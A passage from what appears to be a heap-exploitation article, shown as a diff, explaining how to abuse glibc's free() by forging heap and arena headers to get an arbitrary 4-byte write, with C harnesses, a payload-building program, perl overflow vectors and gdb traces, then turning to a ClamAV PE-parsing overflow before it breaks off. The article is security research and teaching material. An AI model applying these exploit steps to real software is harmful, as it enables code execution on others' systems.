+allocator notices that a free chunk exists (actually, this is the
+most recently free()'ed chunk) which can be used to satisfy the
+request. The hole is returned to the user. Let's verify.
+
+--- snip ---
+$ ./test 
+a = 0x804a050 | b = 0x804a068
+a = 0x804a080 | b = 0x804a068
+a = 0x804a080 | b = 0x804a068 | c = 0x804a050
+--- snip --- 
+
+Indeed, chunk 'c' and the initial 'a', have the same address.
+
+--[ 4. The prev_size under our control
+
+A potential attacker always controls the 'prev_size' field of the
+next chunk even if they are unable to overwrite anything else. The
+'prev_size' lies on the last 4 bytes of the usable space of the
+attacker's chunk. For all you C programmers, there's a function
+called malloc_usable_size() which returns the usable size of
+malloc()'ed area given the corresponding pointer. Although there's
+no manual page for it, glibc exports this function for the end user.
+
+--[ 5. Debugging and options
+
+Last but not least, the signedness and size of the 'size' and
+'prev_size' fields are totally configurable. You can change them
+by resetting the INTERNAL_SIZE_T constant. Throughout this article,
+the author used a x86 32bit system with a modified glibc, compiled
+with the default options. For more info on the glibc compilation
+for debugging purposes see [11], a great blog entry written by
+Echothrust's Chariton Karamitas (hola dude!).
+
+
+---[ IV. In depth analysis on free()'s vulnerable paths
+
+--[ 1. Introduction
+
+Before getting into more details, the author would like to stress
+the fact that the technique presented here requires that the attacker
+is able to write null bytes. That is, this method targets read(),
+recv(), memcpy(), bcopy() or similar functions. The str*cpy() family
+of functions can only be exploited if certain conditions apply (e.g.
+when decoding routines like base64 etc are used). This is, actually,
+the only real life limitation that this technique faces.
+
+In order to bypass the restrictions imposed by glibc an attacker
+must have control over at least 4 chunks. They can overflow the
+first one and wait until the second is freed. Then, a '4 bytes
+anywhere' result is achieved (an alternative technique is to create
+fake chunks rather than expecting them to be allocated, just read
+on). Finding 4 contiguous chunks in the system memory is not a
+serious matter. Just consider the case of a daemon allocating a
+buffer for each client. The attacker can force the daemon to allocate
+contiguous buffers into the heap by repeatedly firing up connections
+to the target host. This is an old technique used to stabilize the
+heap state (e.g in openssl-too-open.c). Controlling the heap memory
+allocation and freeing is a fundamental precondition required to
+build any decent heap exploit after all.
+
+Ok, let's start the actual analysis. Consider the following piece
+of code.
+
+--- snip ---
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+int main(int argc, char *argv[]) {
+  char *ptr, *c1, *c2, *c3, *c4;
+  int i, n, size;
+
+  if(argc != 3) {
+    fprintf(stderr, "%s <n> <size>\n", argv[0]);
+    return -1;
+  }
+
+  n = atoi(argv[1]);
+  size = atoi(argv[2]);
+
+  for(i = 0; i < n; i++) {
+    ptr = malloc(size);
+    fprintf(stderr, "[~] Allocated %d bytes at %p-%p\n",
+      size, ptr, ptr+size);
+  }
+
+  c1 = malloc(80);
+  fprintf(stderr, "[~] Chunk 1 at %p\n", c1);
+
+  c2 = malloc(80);
+  fprintf(stderr, "[~] Chunk 2 at %p\n", c2);
+
+  c3 = malloc(80);
+  fprintf(stderr, "[~] Chunk 3 at %p\n", c3);
+
+  c4 = malloc(80);
+  fprintf(stderr, "[~] Chunk 4 at %p\n", c4);
+
+  read(fileno(stdin), c1, 0x7fffffff); /* (1) */
+
+  fprintf(stderr, "[~] Freeing %p\n", c2);
+  free(c2); /* (2) */
+
+  return 0;
+}
+--- snip ---
+
+This is a very typical situation on many programs, especially network
+daemons. The for() loop emulates the ability of the user to force
+the target program perform a number of allocations, or just indicates
+that a number of allocations have already taken place before the
+attacker is able to write into a chunk. The rest of the code allocates
+four contiguous chunks. Notice that the first one is under the
+attacker's control. At (2) the code calls free() on the second
+chunk, the one physically bordering the attacker's block. To see
+what happens from there on, one has to delve into the glibc free()
+internals.
+
+When a user calls free() within the userspace, the wrapper __libc_free()
+is called. This wrapper is actually the function public_fREe()
+declared in malloc.c. Its job is to perform some basic sanity checks
+and then control is passed to _int_free() which does the hard work
+of actually freeing the chunk. The whole code of _int_free() consists
+of a 'if', 'else if' and 'else' block, which handles chunks depending
+on their properties. The 'if' part handles chunks that belong to
+fast bins (i.e whose size is less than 64 bytes), the 'else if'
+part is the one analyzed here and the one that handles bigger chunks.
+The last 'else' clause is used for very big chunks, those that were
+actually allocated by mmap().
+
+--[ 2. A trip to _int_free()
+
+In order to fully understand the structure of _int_free(), let us
+examine the following snippet.
+
+--- snip ---
+void _int_free(...) {
+  ...
+
+  if(...) {
+    /* Handle chunks of size less than 64 bytes. */
+  }
+  else if(...) {
+    /* Handle bigger chunks. */
+  }
+  else {
+    /* Handle mmap()ed chunks. */
+  }
+}
+--- snip ---
+
+One should actually be interested in the 'else if' part which handles
+chunks of size larger than 64 bytes. This means, of course, that
+the exploitation method presented here works only for such chunk
+sizes but this is not much of a big obstacle as most everyday
+applications allocate chunks usually larger than this.
+
+So, let's see what happens when _int_free() is eventually reached.
+Imagine that 'p' is the pointer to the second chunk (the chunk named
+'c2' in the snippet of the previous section), and that the attacker
+controls the chunk just before the one passed to _int_free(). Notice
+that there are two more chunks after 'p' which are not directly
+accessed by the attacker. Here's a step by step guide to _int_free().
+Make sure you read the comments very carefully.
+
+--- snip ---
+/* Let's handle chunks that have a size bigger than 64 bytes
+ * and that are not mmap()ed. 
+ */
+else if(!chunk_is_mmapped(p)) { 
+  /* Get the pointer to the chunk next to the one 
+   * being freed. This is the pointer to the third 
+   * chunk (named 'c3' in the code).
+   */
+  nextchunk = chunk_at_offset(p, size);
+
+  /* 'p' (the chunk being freed) is checked whether it 
+   * is the av->top (the topmost chunk of this arena). 
+   * Under normal circumstances this test is passed.
+   * Freeing the wilderness chunk is not a good idea 
+   * after all.
+   */
+  if(__builtin_expect(p == av->top, 0)) {
+    errstr = "double free or corruption (top)";
+    goto errout;
+  }
+ 
+  ...
+  ...
+--- snip ---
+
+So, first _int_free() checks if the chunk being freed is the top
+chunk. This is of course false, so the attacker can ignore this
+test as well as the following three.
+
+--- snip ---
+  /* Another lightweight check. Glibc checks here if 
+   * the chunk next to the one being freed (the third 
+   * chunk, 'c3') lies beyond the boundaries of the 
+   * current arena. This is also kindly passed.
+   */
+  if(__builtin_expect(contiguous(av)
+    && (char *)nextchunk >= ((char *)av->top + chunksize(av->top)), 0)) {
+      errstr = "double free or corruption (out)";
+      goto errout;
+  }
+
+  /* The PREV_INUSE flag of the third chunk is checked. 
+   * The third chunk indicates that the second chunk
+   * is in use (which is the default).
+   */
+  if(__builtin_expect(!prev_inuse(nextchunk), 0)) {
+    errstr = "double free or corruption (!prev)";
+    goto errout;
+  }
+
+  /* Get the size of the third chunk and check if its 
+   * size is less than 8 bytes or more than the system 
+   * allocated memory. This test is easily bypassed 
+   * under normal circumstances.
+   */ 
+  nextsize = chunksize(nextchunk);
+  if(__builtin_expect(nextchunk->size <= 2 * SIZE_SZ, 0)
+    || __builtin_expect(nextsize >= av->system_mem, 0)) {
+      errstr = "free(): invalid next size (normal)";
+      goto errout;
+  }
+
+  ...
+  ...
+--- snip ---    
+
+Glibc will then check if backward consolidation should be performed.
+Remember that the chunk being free()'ed is the one named 'c2' and
+that 'c1' is under the attacker's control. Since 'c1' physically
+borders 'c2', backward consolidation is not feasible.
+
+--- snip ---
+  /* Check if the chunk before 'p' (named 'c1') is in 
+   * use and if not, consolidate backwards. This is false. 
+   * The attacker controls the first chunk and this code 
+   * is skipped as the first chunk is considered in use 
+   * (the PREV_INUSE flag of the second chunk is set).
+   */
+  if(!prev_inuse(p)) {
+    ...
+    ...
+  }
+--- snip ---    
+
+The most interesting code snippet is probably the one below:
+ 
+--- snip ---
+  /* Is the third chunk the top one? If not then... */ 
+  if(nextchunk != av->top) {
+    /* Get the prev_inuse flag of the fourth chunk (i.e 
+     * 'c4'). One must overwrite this in order for glibc 
+     * to believe that the third chunk is in use. This 
+     * way forward consolidation is avoided.
+     */
+    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+  
+    ...
+    ...
+
+    /* (1) */
+    bck = unsorted_chunks(av);
+    fwd = bck->fd; 
+    p->bk = bck;
+    p->fd = fwd;
+    /* The 'p' pointer is controlled by the attacker. 
+     * It's the prev_size field of the second chunk 
+     * which is accessible at the end of the usable 
+     * area of the attacker's chunk.
+     */
+    bck->fd = p;
+    fwd->bk = p;
+
+    ...
+    ...
+  }
+--- snip ---
+
+So, (1) is eventually reached. In case you didn't notice this is
+an old fashioned unlink() pointer exchange where unsorted_chunks(av)+8
+gets the value of 'p'. Now recall that 'p' points to the 'prev_size'
+of the chunk being freed, a piece of information that the attacker
+controls. So assuming that the attacker somehow forces the return
+value of unsorted_chunks(av)+8 to point somewhere he pleases (e.g
+.got or .dtors) then the pointer there gets the value of 'p'.
+'prev_size', being a 32bit integer, is not enough for storing any
+real shellcode, but it's enough for branching anywhere via JMP
+instructions. Let's not cope with such minor details yet, here's
+how one may force free() to follow the aforementioned code path.
+
+--- snip ---
+$ # 72 bytes of alphas for the data area of the first chunk
+$ # 4 bytes prev_size of the next chunk (still in the data area)
+$ # 4 bytes size of the second chunk (PREV_INUSE set)
+$ # 76 bytes of garbage for the second chunk's data
+$ # 4 bytes size of the third chunk (PREV_INUSE set)
+$ # 76 bytes of garbage for the third chunk's data
+$ # 4 bytes size of the fourth chunk (PREV_INUSE set)
+$ perl -e 'print "A" x 72, 
+> "\xef\xbe\xad\xde", 
+> "\x51\x00\x00\x00", 
+> "B" x 76,
+> "\x51\x00\x00\x00", 
+> "C" x 76, 
+> "\x51\x00\x00\x00"' > VECTOR
+$ ldd ./test
+        linux-gate.so.1 =>  (0xb7fc0000)
+        libc.so.6 => /home/huku/test_builds/lib/libc.so.6 (0xb7e90000)
+        /home/huku/test_builds/lib/ld-linux.so.2 (0xb7fc1000)
+$ gdb -q ./test
+(gdb) b _int_free
+Function "_int_free" not defined.
+Make breakpoint pending on future shared library load? (y or [n]) y
+Breakpoint 1 (_int_free) pending.
+(gdb) run 1 80 < VECTOR
+Starting program: /home/huku/test 1 80 < VECTOR
+[~] Allocated 80 bytes at 0x804a008-0x804a058
+[~] Chunk 1 at 0x804a060
+[~] Chunk 2 at 0x804a0b0
+[~] Chunk 3 at 0x804a100
+[~] Chunk 4 at 0x804a150
+[~] Freeing 0x804a0b0
+
+Breakpoint 1, _int_free (av=0xb7f85140, mem=0x804a0b0) at malloc.c:4552
+4552      p = mem2chunk(mem);
+(gdb) step
+4553      size = chunksize(p);
+...
+...
+(gdb) step 
+4688          bck = unsorted_chunks(av);
+(gdb) step
+4689          fwd = bck->fd;
+(gdb) step
+4690          p->fd = fwd;
+(gdb) step
+4691          p->bk = bck;
+(gdb) step
+4692          if (!in_smallbin_range(size))
+(gdb) step
+4697          bck->fd = p;
+(gdb) print (void *)bck->fd
+$1 = (void *) 0xb7f85170
+(gdb) print (void *)p
+$2 = (void *) 0x804a0a8
+(gdb) x/4bx (void *)p
+0x804a0a8:      0xef    0xbe    0xad    0xde
+(gdb) quit
+The program is running.  Exit anyway? (y or n) y
+--- snip ---
+
+So, 'bck->fd' has a value of 0xb7f85170, which is actually the 'fd'
+field of the first unsorted chunk. Then, 'fd' gets the value of 'p'
+which points to the 'prev_size' of the second chunk (called 'c2'
+in the code snippet). The attacker places the value 0xdeadbeef over
+there. Eventually, the following question arises: How can one control
+unsorted_chunks(av)+8? Giving arbitrary values to unsorted_chunks()
+may result in a '4 bytes anywhere' condition, just like the old
+fashioned unlink() technique.
+
+
+
+---[ V. Controlling unsorted_chunks() return value
+
+The unsorted_chunks() macro is defined as follows.
+
+--- snip ---
+#define unsorted_chunks(M) (bin_at(M, 1))
+--- snip ---
+
+--- snip ---
+#define bin_at(m, i) \
+  (mbinptr)(((char *)&((m)->bins[((i) - 1) * 2])) \
+    - offsetof(struct malloc_chunk, fd))
+--- snip ---
+
+The 'M' and 'm' parameters of these macros refer to the arena where
+a chunk belongs. A real life usage of unsorted_chunks() is briefly
+shown below.
+
+--- snip ---
+ar_ptr = arena_for_chunk(p);
+...
+...
+bck = unsorted_chunks(ar_ptr);
+--- snip ---
+
+The arena for chunk 'p' is first looked up and then used in the
+unsorted_chunks() macro. What is now really interesting is the way
+the malloc() implementation finds the arena for a given chunk.
+
+--- snip ---
+#define arena_for_chunk(ptr) \
+ (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)
+--- snip ---
+
+--- snip ---
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+--- snip ---
+
+--- snip ---
+#define heap_for_ptr(ptr) \
+ ((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
+--- snip ---
+
+For a given chunk (like 'p' in the previous snippet), glibc checks
+whether this chunk belongs to the main arena by looking at the
+'size' field. If the NON_MAIN_ARENA flag is set, heap_for_ptr() is
+called and the 'ar_ptr' field is returned. Since the attacker
+controls the 'size' field of a chunk during an overflow condition,
+she can set or unset this flag at will. But let's see what's the
+return value of heap_for_ptr() for some sample chunk addresses.
+
+--- snip ---
+#include <stdio.h>
+#include <stdlib.h>
+
+#define HEAP_MAX_SIZE (1024*1024)
+
+#define heap_for_ptr(ptr) \
+ ((void *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
+
+int main(int argc, char *argv[]) {
+  size_t i, n;
+  void *chunk, *heap;
+
+  if(argc != 2) {
+    fprintf(stderr, "%s <n>\n", argv[0]);
+    return -1;
+  }
+
+  if((n = atoi(argv[1])) <= 0) 
+    return -1;
+
+  chunk = heap = NULL;
+  for(i = 0; i < n; i++) {
+     while((chunk = malloc(1024)) != NULL) {
+       if(heap_for_ptr(chunk) != heap) {
+         heap = heap_for_ptr(chunk);
+         break;
+       }
+     }
+
+     fprintf(stderr, "%.2d heap address: %p\n",
+       i+1, heap);
+  }
+
+  return 0;
+}
+--- snip ---
+
+Let's compile and run.
+
+--- snip ---
+$ ./test 10
+01 heap address: 0x8000000
+02 heap address: 0x8100000
+03 heap address: 0x8200000
+04 heap address: 0x8300000
+05 heap address: 0x8400000
+06 heap address: 0x8500000
+07 heap address: 0x8600000
+08 heap address: 0x8700000
+09 heap address: 0x8800000
+10 heap address: 0x8900000
+--- snip ---
+
+This code prints the first N heap addresses. So, for a chunk that
+has an address of 0xdeadbeef, its heap location is at most 1Mbyte
+backwards. Precisely, chunk 0xdeadbeef belongs to heap 0xdea00000.
+So if an attacker controls the location of a chunk's theoretical
+heap address, then by overflowing the 'size' field of this chunk,
+they can fool free() to assume that a valid heap header is stored
+there. Then, by carefully setting up fake heap and arena headers,
+an attacker may be able to force unsorted_chunks() to return a value
+of their choice.
+
+This is not a rare situation; in fact this is how most real life
+heap exploits work. Forcing the target application to perform a
+number of continuous allocations, helps the attacker control the
+arena header. Since the heap is not randomized and the chunks are
+sequentially allocated, the heap addresses are static and can be
+used across all targets! Even if the target system is equipped with
+the latest kernel and has heap randomization enabled, the heap
+addresses can be easily brute forced since a potential attacker
+only needs to know the upper part of an address rather than some
+specific location in the virtual address space.
+
+Notice that the code shown in the previous snippet always produces
+the same results and precisely the ones depicted above. That is,
+given the approximation of the address of some chunk one tries to
+overflow, the heap address can be easily precalculated using
+heap_for_ptr().
+
+For example, suppose that the last chunk allocated by some application
+is located at the address 0x080XXXXX. Suppose that this chunk belongs
+to the main arena, but even If it wouldn't, its heap address would
+be 0x080XXXXX & 0xfff00000 = 0x08000000. All one has to do is to
+force the application perform a number of allocations until the
+target chunk lies beyond 0x08100000. Then, if the target chunk has
+an address of 0x081XXXXX, by overflowing its 'size' field, one can
+make free() assume that it belongs to some heap located at 0x08100000.
+This area is controlled by the attacker who can place arbitrary
+data there. When public_fREe() is called and sees that the heap
+address for the chunk to be freed is 0x08100000, it will parse the
+data there as if it were a valid arena. This will give the attacker
+the chance to control the return value of unsorted_chunks().
+
+
+---[ VI. Creating fake heap and arena headers 
+
+Once an attacker controls the contents of the heap and arena headers,
+what are they supposed to place there? Placing random arbitrary
+values may result in the target application getting stuck by entering
+endless loops or even segfaulting before its time, so, one should
+be careful in not causing such side effects. In this section, we
+deal with this problem. Proper values for various fields are shown
+and an exploit for our example code is developed.
+
+Right after entering _int_free(), do_check_chunk() is called in
+order to perform lightweight sanity checks on the chunk being freed.
+Below is a code snippet taken from the aforementioned function.
+Certain pieces were removed for clarity.
+
+--- snip ---
+char *max_address = (char*)(av->top) + chunksize(av->top);
+char *min_address = max_address - av->system_mem;
+
+if(p != av->top) {
+  if(contiguous(av)) {
+    assert(((char*)p) >= min_address);
+    assert(((char*)p + sz) <= ((char*)(av->top)));
+  }
+}
+--- snip ---
+
+The do_check_chunk() code fetches the pointer to the topmost chunk
+as well as its size. Then 'max_address' and 'min_address' get the
+values of the higher and the lower available address for this arena
+respectively. Then, 'p', the pointer to the chunk being freed is
+checked against the pointer to the topmost chunk. Since one should
+not free the topmost chunk, this code is, under normal conditions,
+bypassed. Next, the arena named 'av', is tested for contiguity. If
+it's contiguous, chunk 'p' should fall within the boundaries of its
+arena; if not the checks are kindly ignored.
+
+So far there are two restrictions. The attacker should provide a
+valid 'av->top' that points to a valid 'size' field. The next set
+of restrictions are the assert() checks which will mess the
+exploitation. But let's first focus on the macro named contiguous().
+
+--- snip ---
+#define NCONTIGUOUS_BIT  (2U)
+#define contiguous(M)    (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+--- snip ---
+
+Since the attacker controls the arena flags, if they set it to some
+integer having the third least significant bit set, then contiguous(av)
+is false and the assert() checks are ignored. Additionally, providing
+an 'av->top' pointer equal to the heap address, results in 'max_address'
+and 'min_address' getting valid values, thus avoiding annoying
+segfaults due to invalid pointer accesses. It seems that the first
+set of problems was easily solved.
+
+Do you think it's over? Hell no. After some lines of code are
+executed, _int_free() uses the macro __builtin_expect() to check
+if the size of the chunk right next to the one being freed (the
+third chunk) is larger than the total available memory of the arena.
+This is a good measure for detecting overflows and any decent
+attacker should get away with it.
+
+--- snip ---
+nextsize = chunksize(nextchunk);
+if(__builtin_expect(nextchunk->size <= 2 * SIZE_SZ, 0)
+  || __builtin_expect(nextsize >= av->system_mem, 0)) {
+    errstr = "free(): invalid next size (normal)";
+    goto errout;
+} 
+--- snip ---
+
+By setting 'av->system_mem' equal to 0xffffffff, one can bypass any
+check regarding the available memory and obviously this one as well.
+Although important for the internal workings of malloc(), the
+'av->max_system_mem' field can be zero since it won't get on the
+attacker's way.
+
+Unfortunately, before even reaching _int_free(), in public_fREe(),
+the mutex for the current arena is locked. Here's the snippet trying
+to achieve a valid lock sequence.
+
+--- snip ---
+#if THREAD_STATS
+  if(!mutex_trylock(&ar_ptr->mutex))
+    ++(ar_ptr->stat_lock_direct);
+  else {
+    mutex_lock(&ar_ptr->mutex);
+    ++(ar_ptr->stat_lock_wait);
+  }
+#else
+  mutex_lock(&ar_ptr->mutex);
+#endif
+--- snip ---
+
+In order to see what happens I had to delve into the internals of
+the NPTL library (also part of glibc). Since NPTL is out of the
+scope of this article I won't explain everything here. Briefly, the
+mutex is represented by a pthread_mutex_t structure consisting of
+5 integers. Giving invalid or random values to these integers will
+result in the code waiting until mutex's release. After messing
+with the NPTL internals, I noticed that setting all the integers
+to 0 will result in the mutex being acquired and locked properly.
+The code then continues execution without further problems.
+
+Right now there are no more restrictions, we can just place the
+value 0x08100020 (the heap header offset plus the heap header size)
+in the 'ar_ptr' field of the _heap_info structure, and give the
+value retloc-12 to bins[0] (where retloc is the return location
+where the return address will be written). Recall that the return
+address points to the 'prev_size' field of the chunk being freed,
+an integer under the attacker's control. What should one place
+there? This is another problem that needs to be solved.
+
+Since only a small amount of bytes is needed for the heap and the
+arena headers at 0x08100000 (or similar address), one can use this
+area for storing shellcode and nops as well. By setting the 'prev_size'
+field of the chunk being freed equal to a JMP instruction, one can
+branch some bytes ahead or backwards so that execution is transfered
+somewhere in 0x08100000 but, still, after the heap and arena headers!
+Valid locations are 0x08100000+X with X >= 72, that is, X should
+be an offset after the heap header and after bins[0]. This is not
+as complicated as it sounds, in fact, all addresses needed for
+exploitation are static and can be easily precalculated!
+
+The code below triggers a '4 bytes anywhere' condition.
+
+--- snip ---
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main() {
+  char buffer[65535], *arena, *chunks;
+
+  /* Clean up the buffer. */
+  bzero(buffer, sizeof(buffer));
+
+  /* Pointer to the beginning of the arena header. */
+  arena = buffer + 360;
+  
+  /* Pointer to the arena header -- offset 0. */
+  *(unsigned long int *)&arena[0]  = 0x08100000 + 12;
+
+  /* Arena flags -- offset 16. */
+  *(unsigned long int *)&arena[16] = 2;
+
+  /* Pointer to fake top -- offset 60. */ 
+  *(unsigned long int *)&arena[60]  = 0x08100000;
+ 
+  /* Return location minus 12 -- offset 68. */
+  *(unsigned long int *)&arena[68]  = 0x41414141 - 12;
+
+  /* Available memory for this arena -- offset 1104. */
+  *(unsigned long int *)&arena[1104]  = 0xffffffff;
+ 
+  /* Pointer to the second chunk's prev_size (shellcode). */
+  chunks = buffer + 10240;
+  *(unsigned long int *)&chunks[0] = 0xdeadbeef;
+
+  /* Pointer to the second chunk. */
+  chunks = buffer + 10244;
+
+  /* Size of the second chunk (PREV_INUSE+NON_MAIN_ARENA). */
+  *(unsigned long int *)&chunks[0] = 0x00000055;
+
+  /* Pointer to the third chunk. */
+  chunks = buffer + 10244 + 80;
+
+  /* Size of the third chunk (PREV_INUSE). */
+  *(unsigned long int *)&chunks[0] = 0x00000051;
+
+  /* Pointer to the fourth chunk. */
+  chunks = buffer + 10244 + 80 + 80;
+
+  /* Size of the fourth chunk (PREV_INUSE). */
+  *(unsigned long int *)&chunks[0] = 0x00000051;
+
+  write(1, buffer, 10244 + 80 + 80 + 4);
+  return;
+}
+--- snip ---
+
+--- snip ---
+$ gcc exploit.c -o exploit
+$ ./exploit > VECTOR
+$ gdb -q ./test
+(gdb) b _int_free
+Function "_int_free" not defined.
+Make breakpoint pending on future shared library load? (y or [n]) y
+Breakpoint 1 (_int_free) pending.
+(gdb) run 722 1024 < VECTOR
+Starting program: /home/huku/test 722 1024 < VECTOR
+[~] Allocated 1024 bytes at 0x804a008-0x804a408
+[~] Allocated 1024 bytes at 0x804a410-0x804a810
+[~] Allocated 1024 bytes at 0x804a818-0x804ac18
+...
+...
+[~] Allocated 1024 bytes at 0x80ffa90-0x80ffe90
+[~] Chunk 1 at 0x80ffe98-0x8100298
+[~] Chunk 2 at 0x81026a0
+[~] Chunk 3 at 0x81026f0
+[~] Chunk 4 at 0x8102740
+[~] Freeing 0x81026a0
+
+Breakpoint 1, _int_free (av=0x810000c, mem=0x81026a0) at malloc.c:4552
+4552      p = mem2chunk(mem);
+(gdb) print *av
+$1 = {mutex = 1, flags = 2, fastbins = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+0x0, 0x0, 0x0}, top = 0x8100000, last_remainder = 0x0, bins = {0x41414135,
+0x0 <repeats 253 times>}, 
+  binmap = {0, 0, 0, 0}, next = 0x0, system_mem = 4294967295,
+max_system_mem = 0}
+--- snip ---
+
+It seems that all the values for the arena named 'av', are in
+position.
+
+--- snip ---
+(gdb) cont
+Continuing.
+
+Program received signal SIGSEGV, Segmentation fault.
+_int_free (av=0x810000c, mem=0x81026a0) at malloc.c:4698
+4698          fwd->bk = p;
+(gdb) print (void *)fwd
+$2 = (void *) 0x41414135
+(gdb) print (void *)fwd->bk
+Cannot access memory at address 0x41414141
+(gdb) print (void *)p      
+$3 = (void *) 0x8102698
+(gdb) x/4bx p
+0x8102698:      0xef    0xbe    0xad    0xde
+(gdb) q
+The program is running.  Exit anyway? (y or n) y
+--- snip ---
+
+Indeed, 'fwd->bk' is the return location (0x41414141) and 'p' is
+the return address (the address of the 'prev_size' of the second
+chunk). The attacker placed there the data 0xdeadbeef. So, it's now
+just a matter of placing the nops and the shellcode at the proper
+location. This is, of course, left as an exercise for the reader
+(the .dtors section is your friend) :-)
+
+
+
+---[ VII. Putting it all together
+
+It's now time to develop a logical plan of what some attacker is
+supposed to do in order to take advantage of such a security hole.
+Although it should be quite clear by now, the steps required for
+successful exploitation are listed below.
+
+* An attacker must force the program perform sequential allocations
+in the heap and eventually control a chunk whose boundaries contain
+the new theoretical heap address. For example, if allocations start
+at 0x080XXXXX then they should allocate chunks until the one they
+control contains the address 0x08100000 within its bounds. The
+chunks should be larger than 64 bytes but smaller than the mmap()
+threshold. If the target program has already performed several
+allocations, it is highly possible that allocations start at
+0x08100000.
+
+* An attacker must make sure that they can overflow the chunk right
+next to the one under their control. For example, if the chunk from
+0x080XXXXX to 0x08101000 is under control, then chunk 0x08101001-
+0x0810XXXX should be overflowable (or just any chunk at 0x081XXXXX).
+
+* A fake heap header followed by a fake arena header should be
+placed at 0x08100000. Their base addresses in the VA space are
+0x08100000 and 0x08100000 + sizeof(struct _heap_info) respectively.
+The bins[0] field of the fake arena header should be set equal to
+the return location minus 12 and the rules described in the previous
+section should be followed for better results. If there's enough
+room, one can also add nops and shellcode there, if not then
+imagination is the only solution (the contents of the following
+chunk are under the attacker's control as well).
+
+* A heap overflow should be forced via a memcpy(), bcopy(), read()
+or similar functions. The exploitation vector should be just like
+the one created by the code in the previous section. Schematically,
+it looks like the following figure (the pipe character indicates
+the chunk boundaries).
+
+[heap_hdr][arena_hdr][...]|[AAAA][...]|[BBBB][...]|[CCCC]
+
+  [heap_hdr] -> The fake heap header. It should be placed on an
+  address aligned to 1Mb e.g 0x08100000.
+
+  [arena_hdr] -> The fake arena header.
+
+  [...] -> Irrelevant data, garbage, alphas etc. If there's enough
+  room, one can place nops and shellcode here.
+
+  [AAAA] -> The size of the second chunk plus PREV_INUSE and
+  NON_MAIN_ARENA.
+
+  [BBBB] -> The size of the third chunk plus PREV_INUSE.
+
+  [CCCC] -> The size of the fourth chunk plus PREV_INUSE.
+
+* The attacker should be patient enough to wait until the chunk
+right next to the one she controls is freed. Voila!
+
+Although this technique can be quite lethal as well as straightforward,
+unfortunately it's not as generic as the heap overflows of the good
+old days. That is, when applied, it can achieve immediate and
+trustworthy results. However, it has a higher complexity than, for
+example, common stack overflows, thus certain prerequisites should
+be met before even someone attempts to deploy such an attack. More
+precisely, the following conditions should be true.
+
+* The target chunks should be larger than 64 bytes and less than
+the mmap() threshold.
+
+* An attacker must have the ability to control 4 sequential chunks
+either directly allocated or fake ones constructed by them.
+
+* An attacker must have the ability to write null bytes. That is,
+one should be able to overflow the chunks via memcpy(), bcopy(),
+read() or similar since strcpy() or strncpy() will not work! This
+is probably the most important precondition for this technique.
+
+
+---[ VIII. The ClamAV case 
+
+--[ 1. The bug
+
+Let's use the knowledge described so far to build a working exploit
+for a known application. After searching at secunia.com for heap
+overflows, I came up with a list of possible targets, the most
+notable one being ClamAV. The cli_scanpe() integer overflow was a
+really nice idea, so, I decided to research it a bit (the related
+advisory is published at [12]). The exploit code for this vulnerability,
+called 'antiviroot', can be found in the 'Attachments' section in
+uuencoded format.
+
+Before attempting to audit any piece of code, the potential attacker
+is advised to build ClamAV using a custom version of glibc with
+debugging symbols (I also modified glibc a bit to print various
+stuff). After following Chariton's ideas described at [11], one can
+build ClamAV using the commands of the following snippet. It is
+rather complicated but works fine. This trick is really useful if
+one is about to use gdb during the exploit development.
+
+--- snip ---
+$ export LDFLAGS=-L/home/huku/test_builds/lib -L/usr/local/lib -L/usr/lib
+$ export CFLAGS=-O0 -nostdinc \
+> -I/usr/lib/gcc/i686-pc-linux-gnu/4.2.2/include \
+> -I/home/huku/test_builds/include -I/usr/include -I/usr/local/include \
+> -Wl,-z,nodeflib \ 
+> -Wl,-rpath=/home/huku/test_builds/lib -B /home/huku/test_builds/lib \
+> -Wl,--dynamic-linker=/home/huku/test_builds/lib/ld-linux.so.2
+$ ./configure --prefix=/usr/local && make && make install
+--- snip ---
+
+When make has finished its job, we have to make sure everything is
+ok by running ldd on clamscan and checking the paths to the shared
+libraries.
+
+--- snip ---
+$ ldd /usr/local/bin/clamscan 
+ linux-gate.so.1 =>  (0xb7ef4000)
+ libclamav.so.2 => /usr/local/lib/libclamav.so.2 (0xb7e4e000)
+ libpthread.so.0 => /home/huku/test_builds/lib/libpthread.so.0 (0xb7e37000)
+ libc.so.6 => /home/huku/test_builds/lib/libc.so.6 (0xb7d08000)
+ libz.so.1 => /usr/lib/libz.so.1 (0xb7cf5000)
+ libbz2.so.1.0 => /usr/lib/libbz2.so.1.0 (0xb7ce5000)
+ libnsl.so.1 => /home/huku/test_builds/lib/libnsl.so.1 (0xb7cd0000)
+ /home/huku/test_builds/lib/ld-linux.so.2 (0xb7ef5000)
+--- snip ---
+
+Now let's focus on the buggy code. The actual vulnerability exists
+in the preprocessing of PE (Portable Executable) files, the well
+known Microsoft Windows executables. Precisely, when ClamAV attempts
+to dissect the headers produced by a famous packer, called MEW, an
+integer overflow occurs which later results in an exploitable
+condition. Notice that this bug can be exploited using various
+techniques but for demonstration purposes I'll stick to the one I
+presented here. In order to have a more clear insight on how things
+work, you are also advised to read the Microsoft PE/COFF specification
+[13] which, surprisingly, is free for download.
+
+Here's the vulnerable snippet, libclamav/pe.c function cli_scanpe().
+I actually simplified it a bit so that the exploitable part becomes
+more clear.
+
+--- snip ---
+ssize = exe_sections[i + 1].vsz;
+dsize = exe_sections[i].vsz;
+...
+
+src = cli_calloc(ssize + dsize, sizeof(char));
+...
+
+bytes = read(desc, src + dsize, exe_sections[i + 1].rsz);
+--- snip --
+
+First, 'ssize' and 'dsize' get their initial values which are
+controlled by the attacker. These values represent the virtual size
+of two contiguous sections of the PE file being scanned (don't try
+to delve into the MEW packer details since you won't find any
+documentation which will be useless even if you will). The sum of
+these user supplied values is used in cli_calloc() which, obviously,
+is just a calloc() wrapper. This allows for an arbitrary sized heap
+allocation, which can later be used in the read operation. There
+are endless scenarios here, but lets see what are the potentials
+of achieving code execution using the new free() exploitation
+technique.
+
+Several limitations that are imposed before the vulnerable snippet
+is reached, make the exploitation process overly complex (MEW fixed
